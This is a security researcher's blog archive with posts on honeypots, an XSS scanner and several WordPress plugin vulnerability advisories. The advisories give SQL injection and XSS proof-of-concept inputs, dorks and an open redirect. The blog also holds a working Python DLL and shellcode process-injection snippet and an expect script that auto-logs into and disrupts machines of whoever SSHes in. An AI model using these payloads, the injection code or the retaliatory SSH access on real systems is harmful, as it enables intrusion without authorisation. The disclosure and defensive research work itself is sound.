Ryan found out a vulnerable copy of swfupload.swf on Xen and Apple websites, he did a resposible disclosure and they fixed it. He got rewarded with a warm pat on the shoulder and a thank you.

Lesson learned: never send out a bug details in the first email, ask instead if they have a bug bounty program :)

DOM XSS Honeypot

Sun, 26 Aug 2012 00:00:00 +0000

While playing around looking for a way to catch xss exploitation on a web application honeypot I’ve stumbled on the the problem of logging DOM XSS injections performed in the fragment portion of the URL.

As specified by the RFCs browsers are not required to send the fragment to the server since it should be used only for client-side purposes. This is a problem in a scenario where a web app honeypot is involved because we would want to log everything that could expose a potential attack.

Since we can’t do much server-side it’s still possible to catch fragments trough a little javascript trickery. For example on page load we can silently send via an ajax call the current window.location (and completely delegate the hassle to analyze it to our honeypot, server-side).

And as DOM XSS are heavily conditioned by the client enviroment (browser type, version, etc) we should send these informations alongside the window.location too for a better analysis.

A quick prototype using jQuery:

// Build the request
var request = { 'url': window.location.toString()};
request = $.extend(request, $.browser);

// Send via ajax
$.ajax({
  type: 'POST',
  url: 'http://honeypot/catch.php',
  data: request,
  complete: function(jqXHR, textStatus) {
    console.log('URL Sent: ' + textStatus);
  }
});

I’ve taken advantage of jQuery.browser to collect browser informations. I put together a simplified proof of concept.

The implementation of catch.php is a matter of choice.

Personally I’d like it more to not send responses back to requests (just throw 404s) to reduce the risk a brute force fuzz might undercover it: it’s an honeypot after all! It’s like a ninja web app!

The downside of this approach is that without s solid error-checking mechanism our ajax communications are downgraded to best effort attempts.

Anyway I am looking to write a plugin for wordpot to handle this so I might eventually change my mind.

Hunting Wordpress Exploitation in the Wild

Tue, 14 Aug 2012 00:00:00 +0000

A thing I noticed working day by day on WPScan’s vulnerability database is that many of the Wordpress (plugins) vulns disclosed are far less than the actual number of exploitable plugins. A quick trip on the official directory and a little browsing over the svn repositories will point out a lot of trivial bugs which might be worth an advisory. I am talking about low hanging fruits like unsophisticated xss and basic sqli.

For example some time ago we were debunking a fake advisory with Ryan and we found out a bunch of xss on the very same plugin just by running DevBug (which was not optimized for Wordpress code). There is a gold mine of easy bugs down there.

The hassle is that properly disclosing a vuln takes a lot of time: you should find it, test it, warn the author, warn Automattic, and publish an advisory. If you find an unresponsive author it may take up to a month and meanwhile an horde of new plugins are published. We can’t keep up and most of the time it’s not worth it.

And what if down the mine there is a true gem nobody knows yet? What if it’s first found by someone with malicious intents? That’s the problem: a vuln exploited before the advisory. And WPscan relies on advisories as it’s main source of data. You do the math.

Having fresh data is crucial: from a defensive stand point an average Wordpress user should care far more about actively exploited vulns than random bugs on his installed plugins. In the end if a vulnerability is not exploited it’s not a real menace (just a potential one). For example I personally like how recurrently a vulnerable timthumb file is found inside a plugin and a wave of wild exploitation arise.

To cath those attacks the approach is standard: honeypots.

This should also be how many commercial appsec vendors like SpiderLabs and Sucuri are detecting attacks. SpiderLabs seems to have a web app honeypot (general purpose? Wordpress specific?) while at Sucuri they might just monitor their client’s Wordpress installations since they seems to have a large wordpress-centric user base.

I am just speculating since nobody is kind enough to share their secrets. The best tool available so far is Glastopf which is general purpose and quite useless in our case.

So to cope with the loss of proper tools I’ve built a Wordpress honeypot from scratch in the hope to catch some exploitation and provide the WPScan project with fresh data. It’s called wordpot and is public domain.

If you were thinking about contributing to WPScan in a way or another starting now you can also help by installing wordpot and let us know how it goes.

DLL and Code Injection in Python

Wed, 30 May 2012 00:00:00 +0000

Snippet time! Two simple functions to inject DLL or shellcodes into running processes (x86).

Enjoy:

import sys
from ctypes import *

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x00000040

DELETE          = 0x00010000
READ_CONTROL    = 0x00020000
WRITE_DAC       = 0x00040000
WRITE_OWNER     = 0x00080000
SYNCHRONIZE     = 0x00100000
PROCESS_ALL_ACCESS = ( DELETE |
                      READ_CONTROL |
                      WRITE_DAC |
                      WRITE_OWNER |
                      SYNCHRONIZE |
                      0xFFF # If < WinXP/WinServer2003 - 0xFFFF otherwhise
                    )

VIRTUAL_MEM = ( 0x1000 | 0x2000 )

KERNEL32 = windll.kernel32

def dllinject(dll_path, pid):
    """ Inject a DLL into target process.

    :param dll_path: path to dll
    :param pid: target process id
    """
    dll_len = len(dll_path)

    h_process = KERNEL32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if not h_process:
        # No handler to PID
        return False

    # Allocate space and write DLL path into it
    dll_address = KERNEL32.VirtualAllocEx(
            h_process, 
            0, 
            dll_len, 
            VIRTUAL_MEM, 
            PAGE_READWRITE)

    w = c_int(0)

    KERNEL32.WriteProcessMemory(
            h_process, 
            dll_address, 
            dll_path, 
            dll_len, 
            byref(w))

    # Where is LoadLibraryA?
    h_kernel32 = KERNEL32.GetModuleHandleA('kernel32.dll')
    h_loadlib = KERNEL32.GetProcAddress(h_kernel32, 'LoadLibraryA')

    # Create thread
    t_id = c_ulong(0)
    if not KERNEL32.CreateRemoteThread(
            h_process, 
            None, 
            0, 
            h_loadlib, 
            dll_address, 
            0, 
            byref(t_id)):
        # Cannot start a thread
        return False
    print t_id
    return True

def codeinject(shellcode, pid):
    """ Inject code into target process.

    :param shellcode: shellcode to inject
    :param pid: target process id
    """
    shellcode_len = len(shellcode)

    h_process = KERNEL32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if not h_process:
        # No handler to PID
        print 'No handler to PID'
        return False

    shellcode_address = KERNEL32.VirtualAllocEx(
            h_process, 
            0, 
            shellcode_len, 
            VIRTUAL_MEM, 
            PAGE_EXECUTE_READWRITE)

    w = c_int(0)

    KERNEL32.WriteProcessMemory(
            h_process, 
            shellcode_address, 
            shellcode, 
            shellcode_len, 
            byref(w))

    t_id = c_ulong(0)
    if not KERNEL32.CreateRemoteThread(
            h_process, 
            None, 
            0, 
            shellcode_address, 
            None, 
            0, 
            byref(t_id)):
        # Cannot start thread
        return False

    return True

Injection is performerd trough CreateRemoteThread which is not supported on Windows Vista, 7 and 8 (you ought to use NtCreateThreadEx instead).

What's New in xsssniper 0.8.x

Fri, 24 Feb 2012 00:00:00 +0000

After some months of development xsssniper has become more stable and a lot has changed since initial releases so it’s about time to peek under the hood of current version: 0.8.x.

First and foremost it’s important to highlight that the goal of this tool is to test an entire web application automatically with minimum human intervention (maybe xssnuker would be a better name!).

With this in mind the biggest change has been done on the injection engine. In first versions an user intervention was needed to choose wich xss payload (Y) to inject and what artifacts (Z) to check in responses:

$ python xsssniper.py --url 'X' --payload 'Y' --check 'Z'

This was pretty much like testing injections from the browser. Awful.

After a little research and testing I redesigned the engine in order to automatically inject a taint and check the response for taint’s artifacts in order to deduct if an injection was correctly performed and where.

The taint is something like this:

seed:seed seed=-->seed\"seed>seed'seed>seed+seed

Where the seed is a random alphanumeric string.

After the taint is injected the response is parsed in a finite state machine that looks for the seed and keep tracks of the logical position in the document (inside a tag attribute, inside an href, inside double quotes, inside singl equotes, etc).

If a seed is discovered in a correct position the injection is verified and reported.

This little change had a great impact on overall performances and has opened the gate to great mass scan functionalities.

In fact, before triggering the injection engine a set of crawler are run with the purpose to collect new targets to test. The crawlers are:

An URL crawler (--crawl) to retrieve every local URL.
A form crawler (--forms) to retrieve every form on the page or, if used in conjunction with the url crawler, on the entire website.
A javascript crawler (--dom) used to collect javascripts, embedded and linked, to test against dom xss.

I am trying my best to detect dom xss too but unfortunately looks like that automatically testing for this vulnerability is a really difficult problem.

The solution adopted, far from being definitive, is to scan every javascript for common sources and sinks as suggested here.

This is nothing more than running a regexp to highlight possible injection points, but no automatic verification is performed so a manual inspection from the user is still needed.

This is because I still dind’t find a satisfying way to statically analyze the javascript: suggestions on this point are more than welcome!

At last we have few options of common utility:

--post and --data to send post requests
--threads to manage the number of threads used
--http-proxy and --tor to scan behind proxies
--user-agent to specify an user agent
--random-agent to randomize the user agent
--cookie to use a cookie

For next versions I have a little todo list with some features I’d like to implement but on top of it there is the possibility to test injections with encoded payloads/taint. I think this is vital because at now discovered injections are still pretty basic.

Oh, and HTTP response splitting! I want that too.

And, last but not least, I’d really like to improve the output format: I tried different styles but it still looks clumsy to me.

That’s all for now. As usual all the code and docs are available here on my bitbucket.

If you have any suggestions, feature request, urge to contribute or just a bug to report… I want to hear from you!

WordPress Mingle Forum <= 1.0.32.1 Multiple Vulnerabilities

Sat, 21 Jan 2012 00:00:00 +0000

# Exploit Title: WordPress Mingle Forum plugin <= 1.0.32.1 Multiple Vulnerabilities
# Date: 2012/01/18  
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.32.1.zip
# Version: 1.0.32.1

You need an authenticated session to exploit the following vulnerabilities.

1) SQL Injection:

POST: admin.php?page=mfgroups&mingleforum_Action=usergroups delete_usergroups: Delete dele_usrgrp%5B%5D: 1 [SQLI]

Vulnerable code:

function delete_usergroups(){
        if (isset($_POST['delete_usergroups'])){
            global $wpdb, $table_prefix;
            $delete_usrgrp = $_POST['delete_usrgrp'];
            $groups = "";
            $count = count($delete_usrgrp);
            for($i = 0; $i < $count; $i++){
                $wpdb->query("DELETE FROM ".$table_prefix."forum_usergroups WHERE id = {$delete_usrgrp[$i]}");
                $wpdb->query("DELETE FROM ".$table_prefix."forum_usergroup2user WHERE `group` = {$delete_usrgrp[$i]}");
            }
            return true;
        }
        return false;

2) SQL Injection:

POST: admin.php?page=mfgroups&mingleforum_action=usergroups&do=add_user_togroup togroupusers: users usergroup: bar [SQLI] add_user_togroup: Add+users

Vulnerable code:

$group =  $_POST['usergroup'];
---
$msg = __("User", "mingleforum")." \"$user\" ".__("added successfully", "mingleforum")."<br />";
$sql = "INSERT INTO ".$table_prefix."forum_usergroup2user (user_id, `group`) VALUES('$id', '$group')";
$wpdb->query($sql);
++$added;

3) Stored XSS:

admin.php?page=mingle-forum

Some options are not escaped so you can inject a payload in the admin interface. Notice that every option is passed through update_option() before being saved in the db so no sqli here

Vulnerable code:

'forum_posts_per_page'           => $wpdb->escape($_POST['forum_posts_per_page']),
'forum_threads_per_page'         => $wpdb->escape($_POST['forum_threads_per_page']),
'forum_require_registration'     => $_POST['forum_require_registration'],
'forum_show_login_form'          => $_POST['forum_show_login_form'],
'forum_date_format'          => $wpdb->escape($_POST['forum_date_format']),
'forum_use_gravatar'             => $_POST['forum_use_gravatar'],
'forum_show_bio'             => $_POST['forum_show_bio'],
'forum_skin'                 => $op['forum_skin'],
'forum_use_rss'              => $_POST['forum_use_rss'],
'forum_use_seo_friendly_urls'    => $_POST['forum_use_seo_friendly_urls'],
'forum_allow_image_uploads'      => $_POST['forum_allow_image_uploads'],
'notify_admin_on_new_posts'      => $_POST['notify_admin_on_new_posts'],
'set_sort'                       => $op['set_sort'],
'forum_use_spam'                 => $_POST['forum_use_spam'],
'forum_use_bbcode'               => $_POST['forum_use_bbcode'],
'forum_captcha'              => $_POST['forum_captcha'],
'hot_topic'                  => $_POST['hot_topic'],
'veryhot_topic'              => $_POST['veryhot_topic'],
'forum_display_name'         => $_POST['forum_display_name'],
'level_one'                  => $_POST['level_one'],
'level_two'                      => $_POST['level_two'],
'level_three'                    => $_POST['level_three'],
'level_newb_name'                => $_POST['level_newb_name'],
'level_one_name'             => $_POST['level_one_name'],
'level_two_name'                 => $_POST['level_two_name'],
'level_three_name'               => $_POST['level_three_name'],
'forum_db_version'               => $op['forum_db_version'],
'forum_disabled_cats'            => explode(",",$_POST['forum_disabled_cats'])

4) Stored XSS and SQLI:

admin.php?page=mfstructure

Adding a new forum both name and description fields are not sanitized so stored xss payload in admin interface AND forum pages is possible. They are escaped only for sqli except for add_forum_group_id which is exploitable

Vulnerable code:

$add_forum_description = $wpdb->escape($_POST['add_forum_description']);
$add_forum_name = $wpdb->escape($_POST['add_forum_name']);
$add_forum_group_id = $_POST['add_forum_group_id'];
---
$wpdb->query("INSERT INTO ".$table_prefix."forum_forums (name, description, parent_id, sort) 
            VALUES('$add_forum_name', '$add_forum_description', '$add_forum_group_id', '$max')");

5) Stored XSS:

admin.php?page=mfads

Every textarea input is not sanitized and can lead to stored xss payloads in admin interface and forums pages (this is somehow intended behavior since HTML is allowed but still…) i.e: “>[XSS]

Vulnerable code:

'mf_ad_above_forum_on'           => $_POST['mf_ad_above_forum_on'],
'mf_ad_above_forum'              => $_POST['mf_ad_above_forum_text'],
'mf_ad_below_forum_on'           => $_POST['mf_ad_below_forum_on'],
'mf_ad_below_forum'              => $_POST['mf_ad_below_forum_text'],
'mf_ad_above_branding_on'        => $_POST['mf_ad_above_branding_on'],
'mf_ad_above_branding'           => $_POST['mf_ad_above_branding_text'],
'mf_ad_above_info_center_on' => $_POST['mf_ad_above_info_center_on'],
'mf_ad_above_info_center'        => $_POST['mf_ad_above_info_center_text'],
'mf_ad_above_quick_reply_on' => $_POST['mf_ad_above_quick_reply_on'],
'mf_ad_above_quick_reply'        => $_POST['mf_ad_above_quick_reply_text'],
'mf_ad_above_breadcrumbs_on' => $_POST['mf_ad_above_breadcrumbs_on'],
'mf_ad_above_breadcrumbs'        => $_POST['mf_ad_above_breadcrumbs_text'],
'mf_ad_below_first_post_on'      => $_POST['mf_ad_below_first_post_on'],
'mf_ad_below_first_post'     => $_POST['mf_ad_below_first_post_text'],
'mf_ad_custom_css'               => $_POST['mf_ad_custom_css']

WordPress Shortcode Redirect <= 1.0.01 Stored XSS

Sat, 21 Jan 2012 00:00:00 +0000

# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18 
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01

Vulnerability

You need permissions to write a post (HTML mode) to exploit the shortcode:

[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']

WordPress uCan Post <= 1.0.09 Stored XSS

Thu, 19 Jan 2012 00:00:00 +0000

# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

Vulnerability

You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages:

Name field is not sanitized and it’s injectable with a payload which will be stored in the pending submission page in admin panel POC: myname’">
Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: [email protected]’">
Post Title is not sanitized and it’s injectable with a payload which will be stored in the pending submissions page in admin panel POC: title’">

WordPress Age Verification <= 0.4 Open Redirect

Tue, 10 Jan 2012 00:00:00 +0000

# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com
Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com

WordPress Pay With Tweet <= 1.1 Multiple Vulnerabilities

Fri, 06 Jan 2012 00:00:00 +0000

# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this:

[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in pay.php

http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

After connecting to twitter:

?link=&22>[XSS]

After submitting the tweet:

?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]

The final download link will be replaced with [REDIRECT-TO-URL]

POC: pay.php?link=%22>&title=&dl=http://brindi.si%27"

A Simple Debugger

Sat, 24 Dec 2011 00:00:00 +0000

Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.

It’s written in python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar.

At the moment of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve registers status and it’s expandable with custom callbacks for handling exceptions.

Building a debugger it’s been an awesome experience (except for the parts where I am swearing on the IA32 Intel docs) and I really learned a lot - and this was the main goal.

Since I am starting to wet my feet in reverse engineering I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.

As usual everything is GPLd and you can find it on my bitbucket page.

Introducing xsssniper

Fri, 16 Sep 2011 00:00:00 +0000

I wrote a little app called xsssniper to automatically test XSS injection points in target URLs.

$ python xsssniper.py --url 'X' --payload 'Y' --check 'Z'

What it does is scanning target URL for GET parameters and then inject an XSS payload (Y) into them and parse the response for artefacts of the injection (Z).

The simplest example would be to inject and check for , if we have a match maybe we have just found an XSS.

If no check is specified xssniper will consider payload and check the same.

If no payload is specified as well a special file will be parsed for common payloads (lib/payloads.xml, feel free to contribute!).

Another useful feature is the ability to crawl the target URL for relative links. Every link found is added to the scan queue and processed, so it’s easier to test an entire website.

In the end this method is not fool proof but it’s a good heuristic to mass find injection points and test escape strategies. Also since there is no browser emulation is your duty to manual test discovered injections against various browser’s xss protections.

Here is the usage:

Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  -p PAYLOAD, --payload=PAYLOAD
                        payload to inject. If the payload is not
                        specified standard payloads from lib/payloads.xml
                        will be used
  -c CHECK, --check=CHECK
                        payload artefact to search in response
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test

It’s development is still active and I am adding features day after day.

For any suggestion feel free to contact me (mail or twitter) meanwhile check out the repository.

Tor + Polipo on OpenBSD

Tue, 14 Jun 2011 00:00:00 +0000

Quick how-to install Tor and Polipo on OpenBSD 4.8, and route almost all the traffic trough them by deafult.

For simplicity I’ve installed from packages. As root:

$ pkg_add tor
$ pkg_add polipo

Next we need to configure Polipo to use Tor and we can take advantage of the sample config file provided by Tor itself:

$ cd /etc/polipo
$ mv config config.old
$ wget http://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
$ mv polipo.conf config

The part worth noticing is this (9050 is Tor default port):

# /etc/polipo/config
socksParentProxy = "localhost:9050"
socksProxyType = socks5

Let’s tune the config a little. I want Polipo to run as a daemon and log (/var/log/polipo) so I’ve added:

# Run as daemon
daemonise = true
logSyslog = true

And I like Tor to run as daemon too. Open Tor config (/etc/tor/torrc) and uncomment/add:

RunAsDaemon 1

For other options you can man polipo and man tor. Note that I didn’t touch the standard ports but you can easily change them from the respective configs.

Now let’s make them run at startup by editing /etc/rc.local and adding:

# Start Tor
if [ -x /usr/local/bin/tor ]; then
    echo -n ' tor'
    /usr/local/bin/tor
fi

# Start Polipo
if [ -x /usr/local/bin/polipo ]; then
    echo -n ' polipo'
    /usr/local/bin/polipo
fi

Last step is to set up the HTTP_PROXY enviroment variable of your shell. This var is used by most application to connect trough a proxy. Open your shell config (like ~/.bashrc) and add:

# Proxy!
http_proxy=http://127.0.0.1:8118/
HTTP_PROXY=$http_proxy
export http_proxy HTTP_PROXY

Some applications use all lower case, some all upper, so we specify both to be safe.

Now to test you can reboot or just start everything by hand (in this case be sure to export HTTP_PROXY):

$ tor
$ polipo
$ curl ip.appspot.com

Please note that not every application understand and use HTTP_PROXY, for better security have a look at torsocks and the Tor wiki.

EDIT 16/02/2012

If you need to connect to known domains without passing trough the tor proxy (like localhost) setting up the NO_PROXY enviroment variable might help:

$ export no_proxy="localhost"
$ export NO_PROXY="localhost"

Then check if the vars have been correctly set:

$ env

Check your shell manual pages for further reference.

Pastebin v3 Command Line Script

Wed, 13 Apr 2011 00:00:00 +0000

Since I haven’t managed to find a command line pastebin script whose based on the new APIs I wrote one.

You can find it on my bitbucket.

Usage:

$ pastebin.py -f python -e 10M -p 1 -t MyPaste &lt; whatever

Pratically you just pipe your data to the script.

Here are some options:

-f defines data format (php, python, etc)
-e the expiry time (10M, 1G, 1D, N)
-p the privacy (1 is private, 0 is public)
-t the title of the paste

The script looks for a config file in your home dir with your dev API key and optionally an username and a valid password (without valid login credentials your pastes will be anonymous).

The first time you run it will create the config (~/.pastebin).

Feel free to fork/edit/whatever it.

Run Xmonad on Snow Leopard

Thu, 16 Dec 2010 00:00:00 +0000

This is a little how-to install and execute xmonad under X11.app on Snow Leopard.

First thing to do (if you haven’t yet) is installing the Haskell platform. I use Homebrew as my packet manager of choice:

brew install haskell-platform

Next we are going to install xmonad from Cabal:

cabal update
cabal install xmonad

Now that everything is installed correctly we need to tweak our X11.app settings in order to run nicely with xmonad.

First open your .bash_profile and append the followings as nicely described here:

# Xmonad stuff
export PATH=/Users/gbrindisi/.cabal/bin:$PATH
export USERWM=`which xmonad`

Next we need an .xinitrc in our $HOME, and we can copy from the stock one:

cp /usr/X11/lib/X11/xinit/xinitrc ~/.xinitrc

Some editing is needed because this .xinitrc executes the quartz-wm by default and xmonad will throw you an error if you’ll try to start it on top of another windows manager.

So open it and locate this if statement and comment/remove everything:

if [ -d /usr/X11/lib/X11/xinit/xinitrc.d ] ; then
    for f in /usr/X11/lib/X11/xinit/xinitrc.d/*.sh ; do
    [ -x "$f" ] &amp;&amp; . "$f"
    done
    unset f
fi

The above statement simply executes every *.sh in the X11’s xinitrc.d directory. One of those is the quartz-wm that you don’t want to run but if you need the others feel free to execute them anyway – I haven’t looked at them in-depth.

I’ve also removed the following lines:

twm &amp;;
xclock -geometry 50x50-1+1 &amp;;
xterm -geometry 80x50+494+51 &amp;;
xterm -geometry 80x20+494-0 &amp;;
exec xterm -geometry 80x66+0+0 -name login

Then you need to append a couple of commands:

source ~/.bash_profile
exec $USERWM

Now everything should be setted up correctly.

The next and final step we need to face is to remap our X11 key bindings because since Command is the default xmonad’s meta key it will happily interfere with other OSX applications.

Create a new .Xmodmap and write:

clear Mod1
clear Mod2
keycode 63 = Mode_switch
keycode 66 = Meta_L
add Mod1 = Meta_L
add Mod2 = Mode_switch

And we are set. (Note: 63 is the left Option key and 66 is the left Command key)

Now run X11.app and enjoy xmonad.

Introducing Pepbot

Thu, 25 Nov 2010 00:00:00 +0000

Introducing my new little creature just released in the wild: Pepbot.

What?

It’s a disposable temporary email service. His main goal is to help you dodge spam by providing a valid throw away mail address you can use instead of your real one. For example when you want to leave a comment on a shady blog, register to a random forum or whatever else.

When prompted for a valid mail simply use [email protected] then go to Pepbot and check your mail or forget about it.

But there is more: the auto-mode!

Many web services needs to verify that the email address you provide is a valid one before confirming your account. To do so they will send a verification link you should click. So ideally you need to check your mail, wait for the verification, click the link and then finally receive a valid account. Here comes the awesomeness: use a special mailbox with the -a tag like [email protected] and Pepbot will click on every link from every mail it receives for you!

Why?

I am learning python so I thought it would be fun to start coding something useful (at least for me), plus I needed something to help me sharpen my sys admin skills.

So far it worked: I’ve coded, I’ve hardened a VPS, I’ve deployed an app (oh man it was painful!)… I learned a lot troughout all the process. And I had fun. Epic win.

How?

Pepbot is built on top of Lamson and… Memcached.

Long story short: whenever a mail arrives Lamson reads it, performs some tasks, and puts it into a local Memcached server. The frontend (which is written with bottle.py) retrieves the emails from the Memcached server whenever an user asks to check a mailbox.

Why Memcached and not some other well-estabilished database? Because I tought (actually I made the math) that writing on disk would be a bottleneck for performances. I wanted something that could scale well and fast against a large volume of stored mails and since ideally the majority of mails will be totally useless (spam! nom nom nom) why bother?

So?

Nothing. Go and play with my baby.

Remeber that he is in public beta: so if you find a bug please let me know!

And if you have suggestions and/or a feature request don’t be shy and contact me.

How To Automate SSH With Expect

Wed, 17 Nov 2010 00:00:00 +0000

Another useful snippet of code to automate SSH with expect:

#!/usr/bin/expect
spawn ssh user@host whatever
expect "*?assword:*"
send -- "password\r"
send -- "\r"

I used it with dynamic SSH connection detection in .profile.

In a lab I am using every machine has the same unprivileged user authenticated with the same password. And SSH is open.

You can guess the popular game: connect to random machines and mess things up while someone is working on them.

In .profile I’ve added a simple check and a call to the expect script to automatically connect to whoever ssh to my machine (and shutdown their computer, or open random porn, you decide):

if [ "$SSH_CONNECTION" ] ; then
    ./release_the_dogs.exp
fi

The victim ip is easily obtained by ${SSH_CONNECTION%* * * *}.

FreeBSD Root Password Recover

Sat, 16 Oct 2010 00:00:00 +0000

Never locked out again from my FreeBSD virtual machine for having forget the root password.

The fix:

Boot in single user mode
Remount the / file system in read and write mode with mount -u / and then mount -a
Setup the new password by passwd
Boot in multi-user mode with exit
???
Profit!

Pheww.

I needed to save this tip somewhere because I know I will forget root password again.

About

Mon, 01 Jan 0001 00:00:00 +0000

Hi, my name is Gianluca Brindisi.

I am a security engineer specialized in cloud & AI security, currently working at Synthesia wrestling with the security challenges of AI.

Previously I was the product security lead engineer for Docker’s Trust and AI groups. Before that I spent much of my career at Spotify, joining during their transition to Google Cloud Platform (GCP), contributed to scale the security organization and eventually leading the cloud security team. Along the way I contributed open source projects, articles and spoke at events.

Once upon a time, I worked as a consultant in the financial sector running security assessments and developing cyber fraud mitigations.

Cloudberry Engineering is my place to learn and note down thoughts around security.

LinkedIn
Github
g // brindi // si

Opinions are my own.

Mon, 01 Jan 0001 00:00:00 +0000

You can subscribe to the articles feed or to the newsletter.